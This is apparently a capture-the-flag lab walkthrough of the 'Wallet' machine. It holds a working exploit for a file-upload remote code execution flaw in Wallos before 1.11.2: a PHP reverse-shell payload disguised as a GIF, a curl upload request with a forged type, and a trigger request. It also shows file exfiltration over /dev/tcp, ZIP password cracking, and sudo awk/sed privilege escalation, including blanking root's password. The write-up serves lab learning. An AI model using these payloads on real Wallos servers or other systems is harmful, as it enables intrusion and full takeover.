Skip to main content

Wallet

export TARGET_IP=172.17.0.2
nmap -p- $TARGET_IP
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Web Server Enumeration

Further investigation revealed a web application running on port 80. This application appears to be a part of a larger domain: wallet.dl. Clicking on the "Get A Quote" button redirected to http://panel.wallet.dl/registration.php. This link was inaccessible due to the missing wallet.dl hostname mapping.

Hostname Resolution

To access the web application, the wallet.dl hostname was mapped to the target IP address in the /etc/hosts file:

echo "$TARGET_IP  wallet.dl" | sudo tee -a /etc/hosts

After mapping the hostname, successful access to http://panel.wallet.dl/ was achieved (after registering and login).

Application Fingerprinting

The "About" section of the web application disclosed the software in use: Wallos v1.11.0.

A vulnerability search on Google revealed a critical vulnerability: Wallos < 1.11.2 - File Upload Remote Code Execution (RCE).

Vulnerability Analysis

  • Vulnerability: Authenticated users can bypass file upload restrictions when creating a new subscription.
  • Impact: This vulnerability allows an attacker to upload a malicious PHP file (webshell) to the server, leading to Remote Code Execution (RCE). With RCE, an attacker can execute arbitrary operating system commands on the vulnerable server, potentially gaining complete control.
  • Affected Versions: Wallos versions before 1.11.2.

Exploitation

1. Authentication

Obtain valid credentials to log into the Wallos application. Use the browser's developer tools (Network tab) to capture the PHPSESSID cookie value after successfully logging in.

2. Navigate to "New Subscription"

Access the functionality to add a new subscription within the application.

3. Prepare the Malicious Payload

A reverse shell payload is more versatile than a basic webshell. Create a reverse shell script on the command line and disguise it as an image file:

shell.php
GIF89a<?php system("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"); ?>

Replace YOUR_IP and YOUR_PORT with the attacker's IP address and port to establish the reverse shell connection.

4. Start a Listener

Set up a listener on your machine to catch the reverse shell:

nc -lvnp YOUR_PORT

5. Upload and Bypass File Restrictions

Send a crafted POST request using curl to upload the reverse shell payload while bypassing the file type restrictions:

curl -X POST \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  -F "name=test_reverse_shell" \
  -F "logo=@shell.php;type=image/jpeg" \
  -F "logo-url=" \
  -F "id=" \
  -F "price=123" \
  -F "currency_id=1" \
  -F "frequency=1" \
  -F "cycle=3" \
  -F "next_payment=2000-01-01" \
  -F "payment_method_id=1" \
  -F "category_id=1" \
  -F "payer_user_id=1" \
  -F "url=" \
  -F "notes=" \
  http://panel.wallet.dl/endpoints/subscription/add.php

Note: Replace YOUR_SESSION_ID with the session ID captured earlier.

6. Verify the Upload

Check the server's response for confirmation of a successful upload. The uploaded file's location is usually specified in the response (e.g., /images/uploads/logos/12345-shell.php).

7. Trigger the Reverse Shell

Access the uploaded file in a browser or via curl to trigger the reverse shell. For example:

curl http://panel.wallet.dl/images/uploads/logos/12345-shell.php

Upon triggering the file, the reverse shell connection should establish between the target server and the attacker's listener.

Privilege Escalation to Pylon

1. Analyze Sudo Permissions

The sudo -l command reveals the following:

Matching Defaults entries for www-data on ece753885f47:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,
    use_pty

User www-data may run the following commands on ece753885f47:
    (pylon) NOPASSWD: /usr/bin/awk

This output indicates that the www-data user can execute the /usr/bin/awk command as the pylon user without providing a password.

2. Exploit the Sudo Privilege

The awk command can be used to execute system commands. Since it can be run as pylon without a password, we can spawn a shell with elevated privileges:

sudo -u pylon /usr/bin/awk 'BEGIN {system("/bin/bash")}'

Privilege Escalation to Pinguino

In /home/pylon we found secretitotraviesito.zip which is is password-protected. We need to crack it to retrieve its contents.

Step 1: Transfer the File to Your Machine

Since we already have access to the target machine as the pylon user, the simplest way to transfer the ZIP file is via Netcat (nc) or SCP (if available).

Transfer with Netcat

On your local machine, set up a listener:

nc -lvnp 4444 > secretitotraviesito.zip

On the target machine, send the file to your listener:

cat secretitotraviesito.zip > /dev/tcp/YOUR_IP/4444

Step 2: Extract the ZIP Hash Using zip2john

The tool zip2john, part of the John the Ripper suite, extracts password hashes from ZIP files into a format that john can process.

Run the following command on your local machine:

zip2john secretitotraviesito.zip > ziphash.txt

Step 3: Crack the Password with john

Use john with a suitable wordlist, such as rockyou.txt, to brute force the password:

john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt
chocolate1       (secretitotraviesito.zip/notitachingona.txt)

Monitor Progress

To check the cracking progress, use:

john --show ziphash.txt
secretitotraviesito.zip/notitachingona.txt:chocolate1:notitachingona.txt:secretitotraviesito.zip::secretitotraviesito.zip
1 password hash cracked, 0 left

Results

The password chocolate1 can now be used to unzip the file:

unzip secretitotraviesito.zip

Alternative Cracking Tools

If john does not succeed, try fcrackzip, which is also designed for password-protected ZIP files:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt secretitotraviesito.zip
  • -D: Specifies a dictionary-based attack.
  • -p: Points to the password list.

Privilege Escalation to Root

After extracting the contents of secretitotraviesito.zip, the file notitachingona.txt revealed the following credentials:

cat notitachingona.txt
> pinguino:pinguinomaloteh

Using these credentials, we can escalate to the pinguino user and analyze its privileges.

Step 1: Switch to the pinguino User

On the target machine, use the following command to switch users:

su pinguino
# Password: pinguinomaloteh
whoami
> pinguino

Step 2: Check Sudo Privileges

Run sudo -l to list the commands pinguino can execute with elevated privileges:

sudo -l
Matching Defaults entries for pinguino on ece753885f47:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,
    use_pty

User pinguino may run the following commands on ece753885f47:
    (ALL) NOPASSWD: /usr/bin/sed

This indicates that pinguino can execute the sed command as any user, including root, without providing a password.

Step 3: Exploit sed for Privilege Escalation

The sed command can execute arbitrary shell commands. As pinguino, use the following command to spawn a root shell:

https://gtfobins.github.io/gtfobins/sed/#sudo

sudo sed -n '1e exec sh 1>&0' /etc/hosts

Alternative

sudo sed -i 's/root:x:/root::/g' /etc/passwd
  • sed: Stream editor that performs text substitution.
  • -i: Edits the file in place, directly modifying /etc/passwd.
  • 's/root:x:/root::/g': Substitution command:
    • s/ starts the substitution.
    • root:x: matches the line in /etc/passwd where the root user's password hash is stored (x indicates the password is stored in /etc/shadow).
    • root:: replaces the matched text, effectively removing the password for the root account.
    • /g applies the substitution globally (to all matches, though only one line applies here).
    • /etc/passwd: The target file being modified.

Step 4: Verify Root Access

After running the command, confirm that you now have root privileges:

whoami
> root